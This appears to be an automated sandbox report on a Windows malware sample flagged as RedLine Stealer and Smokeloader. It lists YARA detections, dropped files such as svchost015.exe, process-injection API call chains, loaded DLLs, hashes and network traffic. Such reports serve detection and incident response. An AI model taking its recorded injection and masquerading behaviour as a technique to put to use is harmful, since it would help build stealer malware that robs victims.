              Source: explorer.exe, 00000002.00000000.2160563732.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3094588061.0000000007B7D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3099530008.0000000007B7D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3359137352.0000000007B7D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/world/us-supplies-ukraine-with-a-million-rounds-of-ammunition-seized-
              Source: explorer.exe, 00000002.00000000.2160563732.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3094588061.0000000007B7D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3099530008.0000000007B7D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3359137352.0000000007B7D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/travel/news/you-can-t-beat-bobby-flay-s-phoenix-airport-restaurant-one-of-
              Source: explorer.exe, 00000002.00000000.2160563732.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3094588061.0000000007B7D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3099530008.0000000007B7D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3359137352.0000000007B7D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/california-s-reservoirs-runneth-over-in-astounding-reve
              Source: explorer.exe, 00000002.00000000.2160563732.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3094588061.0000000007B7D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3099530008.0000000007B7D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3359137352.0000000007B7D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com:443/en-us/feed
              Source: 9A25.exe, 00000006.00000002.2794045093.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe.6.dr, 9A25.exe.2.drString found in binary or memory: https://www.ssl.com/repository0
              Source: 9A25.exe, 00000006.00000002.2794045093.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe, 00000007.00000000.2788168210.0000000000401000.00000020.00000001.01000000.00000007.sdmp, svchost015.exe.6.drString found in binary or memory: https://www.x-ways.net/forensics/x-tensions.html
              Source: 9A25.exe, 00000006.00000002.2794045093.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe, 00000007.00000000.2788168210.0000000000401000.00000020.00000001.01000000.00000007.sdmp, svchost015.exe.6.drString found in binary or memory: https://www.x-ways.net/forensics/x-tensions.htmlf
              Source: 9A25.exe, 00000006.00000002.2794045093.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe, 00000007.00000000.2788168210.0000000000401000.00000020.00000001.01000000.00000007.sdmp, svchost015.exe.6.drString found in binary or memory: https://www.x-ways.net/winhex/forum/
              Source: 9A25.exe, 00000006.00000002.2794045093.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe, 00000007.00000000.2788168210.0000000000401000.00000020.00000001.01000000.00000007.sdmp, svchost015.exe.6.drString found in binary or memory: https://www.x-ways.net/winhex/forum/www.x-ways.net/winhex/templates/www.x-ways.net/dongle_protection
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
              Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
              Source: unknownHTTPS traffic detected: 84.32.84.152:443 -> 192.168.2.6:49744 version: TLS 1.2

              Key, Mouse, Clipboard, Microphone and Screen Capturing

              barindex
              Source: Yara matchFile source: 00000000.00000002.2179176948.00000000007C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.2404904478.0000000002261000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2179285739.0000000002261000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.2404842660.0000000002240000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 7.0.svchost015.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000006.00000002.2794045093.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: 9A25.exe PID: 3500, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: svchost015.exe PID: 6812, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\svchost015.exe, type: DROPPED

              System Summary

              barindex
              Source: 00000004.00000002.2404618518.00000000006E8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
              Source: 00000000.00000002.2179135216.00000000007A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
              Source: 00000000.00000002.2179023216.0000000000638000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
              Source: 00000000.00000002.2179176948.00000000007C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
              Source: 00000004.00000002.2404904478.0000000002261000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
              Source: 00000000.00000002.2179285739.0000000002261000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
              Source: 00000004.00000002.2404842660.0000000002240000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
              Source: 00000004.00000002.2404360688.0000000000670000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
              Source: Process Memory Space: explorer.exe PID: 4004, type: MEMORYSTRMatched rule: Semi-Auto-generated - file ironshell.php.txt Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls
              Source: C:\Users\user\Desktop\oZB7n3wuNk.exeCode function: 0_2_00402F55 RtlCreateUserThread,NtTerminateProcess,0_2_00402F55
              Source: C:\Users\user\Desktop\oZB7n3wuNk.exeCode function: 0_2_00401493 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401493
              Source: C:\Users\user\Desktop\oZB7n3wuNk.exeCode function: 0_2_00401476 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401476
              Source: C:\Users\user\Desktop\oZB7n3wuNk.exeCode function: 0_2_004014D5 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_004014D5
              Source: C:\Users\user\Desktop\oZB7n3wuNk.exeCode function: 0_2_004014AA NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_004014AA
              Source: C:\Users\user\Desktop\oZB7n3wuNk.exeCode function: 0_2_004014AD NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_004014AD
              Source: C:\Users\user\Desktop\oZB7n3wuNk.exeCode function: 0_2_004014B1 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_004014B1
              Source: C:\Users\user\Desktop\oZB7n3wuNk.exeCode function: 0_2_004030B2 NtTerminateProcess,0_2_004030B2
              Source: C:\Users\user\AppData\Roaming\birajciCode function: 4_2_00402F55 RtlCreateUserThread,NtTerminateProcess,4_2_00402F55
              Source: C:\Users\user\AppData\Roaming\birajciCode function: 4_2_00401493 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,4_2_00401493
              Source: C:\Users\user\AppData\Roaming\birajciCode function: 4_2_00401476 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,4_2_00401476
              Source: C:\Users\user\AppData\Roaming\birajciCode function: 4_2_004014D5 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,4_2_004014D5
              Source: C:\Users\user\AppData\Roaming\birajciCode function: 4_2_004014AA NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,4_2_004014AA
              Source: C:\Users\user\AppData\Roaming\birajciCode function: 4_2_004014AD NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,4_2_004014AD
              Source: C:\Users\user\AppData\Roaming\birajciCode function: 4_2_004014B1 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,4_2_004014B1
              Source: C:\Users\user\AppData\Roaming\birajciCode function: 4_2_004030B2 NtTerminateProcess,4_2_004030B2
              Source: C:\Users\user\AppData\Local\Temp\9A25.exeCode function: 6_2_0301A090 NtAllocateVirtualMemory,CreateFileA,WriteFile,FindCloseChangeNotification,CreateProcessA,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,Wow64GetThreadContext,Wow64SetThreadContext,ResumeThread,ExitProcess,6_2_0301A090
              Source: C:\Users\user\AppData\Local\Temp\9A25.exeCode function: 6_2_030196B0 NtProtectVirtualMemory,NtProtectVirtualMemory,6_2_030196B0
              Source: C:\Users\user\AppData\Local\Temp\9A25.exeCode function: 6_2_030193F0 NtCreateFile,CreateFileMappingA,MapViewOfFile,FindCloseChangeNotification,6_2_030193F0
              Source: C:\Users\user\Desktop\oZB7n3wuNk.exeCode function: 0_2_00401C5E0_2_00401C5E
              Source: C:\Users\user\Desktop\oZB7n3wuNk.exeCode function: 0_2_00401C0A0_2_00401C0A
              Source: C:\Users\user\Desktop\oZB7n3wuNk.exeCode function: 0_2_007A1C710_2_007A1C71
              Source: C:\Users\user\Desktop\oZB7n3wuNk.exeCode function: 0_2_007A154D0_2_007A154D
              Source: C:\Users\user\Desktop\oZB7n3wuNk.exeCode function: 0_2_007A1CC50_2_007A1CC5
              Source: C:\Users\user\AppData\Roaming\birajciCode function: 4_2_00401C5E4_2_00401C5E
              Source: C:\Users\user\AppData\Roaming\birajciCode function: 4_2_00401C0A4_2_00401C0A
              Source: C:\Users\user\AppData\Roaming\birajciCode function: 4_2_00671C714_2_00671C71
              Source: C:\Users\user\AppData\Roaming\birajciCode function: 4_2_0067154D4_2_0067154D
              Source: C:\Users\user\AppData\Roaming\birajciCode function: 4_2_00671CC54_2_00671CC5
              Source: C:\Users\user\AppData\Local\Temp\9A25.exeCode function: 6_2_0301A7006_2_0301A700
              Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\9A25.exe 681EEECECD77EB1433111641C33C8424EAF2C1265E2D4A7E4D6F023865FB5D94
              Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\svchost015.exe 7824B50ACDD144764DAC7445A4067B35CF0FEF619E451045AB6C1F54F5653A5B
              Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 4004 -s 9264
              Source: oZB7n3wuNk.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: 00000004.00000002.2404618518.00000000006E8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
              Source: 00000000.00000002.2179135216.00000000007A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
              Source: 00000000.00000002.2179023216.0000000000638000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
              Source: 00000000.00000002.2179176948.00000000007C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
              Source: 00000004.00000002.2404904478.0000000002261000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
              Source: 00000000.00000002.2179285739.0000000002261000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
              Source: 00000004.00000002.2404842660.0000000002240000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
              Source: 00000004.00000002.2404360688.0000000000670000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
              Source: Process Memory Space: explorer.exe PID: 4004, type: MEMORYSTRMatched rule: ironshell_php author = Neo23x0 Yara BRG + customization by Stefan -dfate- Molls, description = Semi-Auto-generated - file ironshell.php.txt, hash = 8bfa2eeb8a3ff6afc619258e39fded56
              Source: oZB7n3wuNk.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: birajci.2.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: svchost015.exe.6.drBinary string: \Device\CDROM
              Source: svchost015.exe.6.drBinary string: \Device\PhysicalMemory
              Source: svchost015.exe.6.drBinary string: \Device\PhysicalMemoryU
              Source: svchost015.exe.6.drBinary string: ol, por favorI&taliano, per favore&Portugues, por favorPo&lski*.*.prj.xfcwhxvmem.pos.settings.zip.e01.dd001.ctr.txt.png.mem.memservice_workeredgetmp.tmpemlmsg.jpgheic*.pdf;*.ps;*.tif;*.jpg;*.png;*.gif;*.bmp.htmlhtmlxmlsqlitesqlitedbregistryolk14messageedbsnssevtevtxplistbplist*.xhdTesseractOCRExcireExcire ForensicsExcire.exe.\!imagespst,ost,edb,dbx,pfc,mbox,eml,emlx,mht,mim,msg,olk14msgsource,olk14message,olk14msgattach,olk15msgattach,olk15msgsource,olk15message,oft,mbs,tnefzip,zipx,7z,rar,tar,gz,tgz,bzip,bz2docx,xlsx,pptx,ppsx,odt,ods,odb,odg,odf,odp,key,numbers,pages,xps,oxps,opendoc,sxw,sxg,sxc,stc,sxm,sxi,sxd,std,stw,sxm,hwpxufdr,ova,gbp,odm,a2w,kmz,kpr,pxl2,bbb,idml,cdr,sbb,notebook,mmap,spd,cdmz,mwb,nbak,pez,artx,cmap,sh3d,dpp,snb,dbk,sps,spv,wpp,jnxthmx,war,otp,xap,dwfx,epub,btapp,u3p,nth,ibooks,3dxml,htmlz,cbz,ear,potx,ppam,xltx,xlsm,dotx,docm,dotx,vsdx,gadget,rbf,eftx,gg,ottjar,apk,ipa,appx,crx,cabzxp,ots,wmz,air,accft,vssx,ipcc,ipsw,xpi;*.docx;*.pptx;*.xlsx;*.vsdx;*.vsdm;*.odt;*.odp;*.ods*.xls;*.xlsx;*.odsNEARNTNRFlexFilterANDOR (=offline)XWF_MTX_Alt Gr +Ctrl +Shift +Space +Ctrl+Alt +HeaderBlank line(s) found.Power down after x minutesFallback code page for plain text*\\\\?\\\.\\\?\Volume{\Device\HarddiskVolume\Device\CdRom... .. FILEBAAD($MFT) WofCompressedDataIndex Record$EFS.PFILENTFS: EA(EA)NO NAME > 0x100x10 < 0x30Unable to terminate worker thread.X-Ways Decompressed [block hash values] [PhotoDNA] [FuzZyDoc]PhotoDNAFuzZyDoc_newTeamsMessagesDataTeamsMeetingsRecoverable Items\DeletionsTop of Personal FoldersSenRec.dirPasswords.txtSearch Terms.txtNewUsers.dirKeywordsLockSpecial Interest.sectorX-Ways SessionSleep(0) Frequency (0..100)non-existent sector debug info123123|123|1234|12345|123456|1234567|12345678|123456789|987654321|abc123|123abc|121212|000000|666666|qwerty|password|password1|iloveyou|monkey|dragon|qwertyuiop-------- *** ---*** ***nLicID& --> --> .journal.exclude.badblocksFile mode:Sequential #TOCBLOCKVMDBVBLKContainerFILETIMEZone.Identifier[ZoneTransfer]System Volume InformationNot enough space for metadata at offset<html>
              Source: svchost015.exe.6.drBinary string: \Device\harddisk
              Source: svchost015.exe.6.drBinary string: \Device\Floppy
              Source: svchost015.exe.6.drBinary string: \Device\Floppy\Device\CDROM\Device\harddisk\partition0SQ
              Source: classification engineClassification label: mal100.troj.evad.winEXE@8/11@3/3
              Source: C:\Users\user\Desktop\oZB7n3wuNk.exeCode function: 0_2_0064AC68 CreateToolhelp32Snapshot,Module32First,0_2_0064AC68
              Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\birajciJump to behavior
              Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4004
              Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\9A25.tmpJump to behavior
              Source: Yara matchFile source: 7.0.svchost015.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000007.00000000.2788168210.0000000000401000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.2794045093.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\svchost015.exe, type: DROPPED
              Source: unknownProcess created: C:\Windows\explorer.exe
              Source: oZB7n3wuNk.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\AppData\Local\Temp\9A25.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\9A25.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : Select Name from Win32_Processor
              Source: C:\Windows\explorer.exeFile read: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
              Source: C:\Users\user\Desktop\oZB7n3wuNk.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: oZB7n3wuNk.exeReversingLabs: Detection: 63%
              Source: oZB7n3wuNk.exeVirustotal: Detection: 63%
              Source: unknownProcess created: C:\Users\user\Desktop\oZB7n3wuNk.exe "C:\Users\user\Desktop\oZB7n3wuNk.exe"
              Source: unknownProcess created: C:\Users\user\AppData\Roaming\birajci C:\Users\user\AppData\Roaming\birajci
              Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\9A25.exe C:\Users\user\AppData\Local\Temp\9A25.exe
              Source: C:\Users\user\AppData\Local\Temp\9A25.exeProcess created: C:\Users\user\AppData\Local\Temp\svchost015.exe C:\Users\user\AppData\Local\Temp\svchost015.exe
              Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 4004 -s 9264
              Source: unknownProcess created: C:\Windows\explorer.exe explorer.exe
              Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\9A25.exe C:\Users\user\AppData\Local\Temp\9A25.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\9A25.exeProcess created: C:\Users\user\AppData\Local\Temp\svchost015.exe C:\Users\user\AppData\Local\Temp\svchost015.exeJump to behavior
              Source: C:\Users\user\Desktop\oZB7n3wuNk.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\oZB7n3wuNk.exeSection loaded: msimg32.dllJump to behavior
              Source: C:\Users\user\Desktop\oZB7n3wuNk.exeSection loaded: msvcr100.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: windows.cloudstore.schema.shell.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: taskschd.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: webio.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\birajciSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\birajciSection loaded: msimg32.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\birajciSection loaded: msvcr100.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\9A25.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\9A25.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\9A25.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\9A25.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\9A25.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\9A25.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\9A25.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\9A25.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\9A25.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\9A25.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\9A25.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\9A25.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\9A25.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\9A25.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\9A25.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\9A25.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\9A25.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\9A25.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\9A25.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\svchost015.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\svchost015.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\svchost015.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\svchost015.exeSection loaded: rstrtmgr.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\svchost015.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\svchost015.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\svchost015.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\svchost015.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\svchost015.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\svchost015.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\svchost015.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\svchost015.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\svchost015.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\svchost015.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\svchost015.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\svchost015.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\svchost015.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\svchost015.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\svchost015.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: aepic.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: twinapi.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: dxgi.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wtsapi32.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: dwmapi.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: twinapi.appcore.dllJump to behavior
